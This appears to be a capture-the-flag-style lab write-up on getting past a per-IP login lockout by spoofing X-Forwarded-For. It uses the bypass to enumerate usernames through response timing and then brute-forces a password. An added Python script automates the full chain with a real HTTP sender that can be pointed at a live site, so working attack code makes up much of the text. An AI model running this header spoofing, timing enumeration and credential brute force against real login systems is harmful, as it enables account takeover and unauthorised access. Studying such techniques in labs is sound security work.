Lab: Username enumeration via response timing
The application locks you out after a few failed login attempts (30-minute lockout, tracked per client IP), so the rate limit has to be bypassed before usernames can be enumerated

IP-spoofing header checklist, from:
https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting

Adding these headers to the login request lifts the restriction, because the lockout is keyed on the client IP and the app trusts one of these headers as the source of that IP:
X-Real-Ip: 1.2.3.4
X-Forwarded-For: 1.2.3.4
X-Originating-Ip: 1.2.3.4
Client-Ip: 1.2.3.4
True-Client-Ip: 1.2.3.4

then send around 5 more bad attempts with these headers set
the spoofed address 1.2.3.4 gets locked too, which confirms the lockout follows the (spoofed) IP rather than the session

changing the IP in the headers from 1.2.3.4 to 1.2.3.5
unlocks you again:
X-Real-Ip: 1.2.3.5
X-Forwarded-For: 1.2.3.5
X-Originating-Ip: 1.2.3.5
Client-Ip: 1.2.3.5
True-Client-Ip: 1.2.3.5

to find out which header is actually read, keep X-Forwarded-For at the locked address 1.2.3.5 and change the others to 1.2.3.6
if you are still locked out, the app only looks at X-Forwarded-For and ignores the rest, so that is the only header we need:
X-Forwarded-For: 1.2.3.5
X-Originating-Ip: 1.2.3.6
Client-Ip: 1.2.3.6
True-Client-Ip: 1.2.3.6

In Intruder choose Pitchfork: payload position 1 is the last octet of X-Forwarded-For, position 2 is the username. Pitchfork walks both sets in step, so every request goes out from a fresh spoofed address and no address ever reaches the lockout threshold.
Use a very long password (100+ characters): the app only checks the password when the username exists, so a valid username takes measurably longer to respond. Sort the results by the "Response received" timing column rather than by status or length.

for set 1 choose numbers 10-110, because username.txt has 101 usernames and each one needs its own IP

for set 2 load the usernames

ftp has by far the largest "Response received" time
why? because ftp is a valid username, so the app goes on to check the long password, and that check takes noticeably longer; invalid usernames are rejected before the password is touched, so the response length and status give nothing away, only the timing does

now brute-force the password: username fixed to ftp, set 1 still the rotating X-Forwarded-For octet, set 2 the password list

The password jordan is the hit: it returns a 302 (redirect to the account page) while every other password returns 200

we can't log in from the browser directly because our real IP is still in the 30-minute lockout

but we can intercept the login request in Burp and add an X-Forwarded-For header with a fresh address
together with the correct username and password, and it goes through:
X-Forwarded-For: 10.20.30.50

that solves the lab
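The whole procedure above (find the honoured IP header, time each username behind a rotating X-Forwarded-For, brute-force the password, log in from a fresh address) as an added Python example, not code from the lab or from the write-up. LabSimulator is a constructed stand-in for the lab so the script runs offline; the form field names username/password, the lockout message substring and the lab URL placeholder are assumptions. Unlike the write-up, which changes all the candidate headers at once, find_ip_header probes each header on its own, and enumerate_usernames times every username several times and keeps the median, which is what you want against a real network with jitter.

```python
"""Timing-based username enumeration behind a per-IP lockout, rotating X-Forwarded-For."""
import ipaddress
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request

LOCKOUT_TEXT = "too many incorrect login attempts"   # substring of the lockout page (assumption)
LONG_PASSWORD = "A" * 200   # long enough that checking it for a real user takes measurably longer
CANDIDATE_HEADERS = ["X-Real-Ip", "X-Forwarded-For", "X-Originating-Ip", "Client-Ip", "True-Client-Ip"]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None   # keep the 302 visible instead of following it


def http_sender(url):
    """send(headers, username, password) -> (status, seconds, body) against the real login form."""
    opener = urllib.request.build_opener(_NoRedirect())

    def send(headers, username, password):
        data = urllib.parse.urlencode({"username": username, "password": password}).encode()
        req = urllib.request.Request(url, data=data, headers=headers, method="POST")
        start = time.perf_counter()
        try:
            with opener.open(req, timeout=10) as resp:
                status, body = resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:   # an unfollowed 302 surfaces here
            status, body = err.code, err.read().decode(errors="replace")
        return status, time.perf_counter() - start, body
    return send


class LabSimulator:
    """Constructed model of the lab: trusts X-Forwarded-For as the client IP, locks an IP after
    MAX_FAILURES failed logins, and only spends time on the password when the username exists."""
    MAX_FAILURES = 3
    REAL_IP = "203.0.113.7"

    def __init__(self, users):
        self.users, self.failures = users, {}   # users: {username: password} (constructed)

    def send(self, headers, username, password):
        ip = headers.get("X-Forwarded-For", self.REAL_IP)
        if self.failures.get(ip, 0) >= self.MAX_FAILURES:
            return 200, 0.001, "You have made too many incorrect login attempts"
        elapsed = 0.001
        if username in self.users:
            elapsed += 0.0005 * len(password)   # password check cost grows with its length
            if self.users[username] == password:
                return 302, elapsed, ""
        self.failures[ip] = self.failures.get(ip, 0) + 1
        return 200, elapsed, "Invalid username or password."


def find_ip_header(send, attempts=5, fresh_ip="1.2.3.5"):
    """Trip the lockout for the real client IP, then return the first header whose fresh value lifts it."""
    for _ in range(attempts):
        _, _, body = send({}, "nosuchuser", "wrong")
        if LOCKOUT_TEXT in body.lower():
            break
    else:
        raise RuntimeError("no lockout observed; raise attempts")
    for header in CANDIDATE_HEADERS:
        _, _, body = send({header: fresh_ip}, "nosuchuser", "wrong")
        if LOCKOUT_TEXT not in body.lower():
            return header
    return None


def enumerate_usernames(send, header, usernames, start_ip="1.2.3.10", repeats=3):
    """Pitchfork equivalent: every request carries a never-used spoofed IP, so nothing gets locked.
    Each username is timed `repeats` times with the long password; the median smooths out jitter.
    Returns (slowest username, {username: median seconds})."""
    next_ip = ipaddress.IPv4Address(start_ip)
    medians = {}
    for user in usernames:
        samples = []
        for _ in range(repeats):
            _, elapsed, _ = send({header: str(next_ip)}, user, LONG_PASSWORD)
            next_ip += 1
            samples.append(elapsed)
        medians[user] = statistics.median(samples)
    return max(medians, key=medians.get), medians


def brute_force_password(send, header, username, passwords, start_ip="1.2.4.10"):
    """Run the password list for one known username, still one fresh IP per request; a 302 is the hit."""
    ip = ipaddress.IPv4Address(start_ip)
    for pw in passwords:
        status, _, _ = send({header: str(ip)}, username, pw)
        ip += 1
        if status == 302:
            return pw
    return None


if __name__ == "__main__":
    sim = LabSimulator({"ftp": "jordan", "wiener": "peter"})   # constructed accounts
    hdr = find_ip_header(sim.send)
    user, timings = enumerate_usernames(sim.send, hdr, ["admin", "root", "ftp", "guest"])
    print(hdr, user, brute_force_password(sim.send, hdr, user, ["123456", "jordan"]))
```

Against the real lab, replace sim.send with http_sender("https://YOUR-LAB-ID.web-security-academy.net/login") (placeholder URL) and pass the real wordlists; because every request uses a fresh address, the final login with the recovered credentials also goes through while your real IP is still locked out.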
